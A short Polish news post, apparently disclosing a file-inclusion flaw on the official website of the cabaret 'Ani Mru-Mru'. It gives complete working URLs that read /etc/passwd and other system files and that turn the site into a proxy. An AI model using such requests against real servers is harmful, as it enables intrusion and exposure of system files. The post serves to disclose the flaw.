Luki na oficjalnej stronie kabaretu
Oficjalna strona znanego kabaretu „Ani Mru-Mru” posiada błędy, które pozwalają „podglądać” pliki znajdujace się na serwerze.
Aby otrzymać dostęp do pliku passwd wystarczy wpisać w przeglądarce http://www.animrumru.pinco.pl/dane/index_2.php?dzial=/etc/passwd.
Przykładowo możemy otrzymać dostęp do innych plików np: /etc/services i /etc/hosts.
Możemy również skorzystać z „proxy”. Wystarczy tylko wpisać adres dowolnej strony np: http://www.animrumru.pinco.pl/dane/index_2.php?dzial=http://hacking.pl.
Podziękowania dla BIGHard’a za podesłanie informacji.